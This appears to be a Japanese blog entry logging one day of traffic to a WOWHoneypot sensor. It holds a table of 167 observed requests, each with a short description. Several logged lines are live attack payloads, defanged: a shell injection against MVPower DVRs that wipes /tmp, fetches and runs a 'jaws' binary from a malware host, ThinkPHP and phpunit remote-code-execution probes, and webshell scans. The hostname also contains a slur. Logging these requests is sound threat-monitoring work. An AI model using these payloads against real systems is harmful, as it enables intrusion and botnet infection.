WOWHoneypot観察(334日目)
2020/02/15(土)
トータルは167件でした。
ハンティングログは以下です。
42.115.53.222 wget+hxxp[:]//jhasdjahsdjasfkdaskdfasBOT[.]niggacumyafacenet[.]xyz/jaws |
www.virustotal.com
www.virustotal.com
件数 | 概要 | リクエスト |
---|---|---|
91 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
45 | アクセス | GET / |
6 | 調査 | GET /script |
2 | phpMyAdminの調査 | GET /phpmyadmin/index.php |
2 | phpMyAdminの調査 | GET /phpMyAdmin/index.php |
2 | Webshell設置の調査 | GET /ab178b72f07ad856e8662cb2fb793ab7.php |
2 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
2 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php |
2 | Webshell設置の調査 | GET /585f9eb3350f175be5cea2e9258772a4.php |
2 | Webshell設置の調査 | GET /048F246A2631A86BCCD05508D05F5418.php |
1 | phpunitの脆弱性を狙った通信 | POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
1 | Spring Data Commonsの脆弱性を狙った通信 | POST /users?page=&size=5 |
1 | ThinkPHPの脆弱性を狙った通信 | POST /TP/public/index.php?s=captcha |
1 | Solrの調査 | GET /solr/admin/info/system?wt=json |
1 | MVPower DVRなどの脆弱性を狙った通信 | GET /shell?cd+/tmp;rm+-rf+*;wget+hxxp[:]//jhasdjahsdjasfkdaskdfasBOT.niggacumyafacenet.xyz/jaws;sh+/tmp/jaws |
1 | 調査 | GET /login |
1 | 調査 | GET /is_test |
1 | ThinkPHPの脆弱性を狙った通信 | GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP |
1 | ThinkCMFの脆弱性を狙った通信 | GET /?a=fetch&content= |
1 | リモートデバッグの調査 | GET /?XDEBUG_SESSION_START=phpstorm |
1 | 不正中継の試み | CONNECT ip.ws.126.net:443 |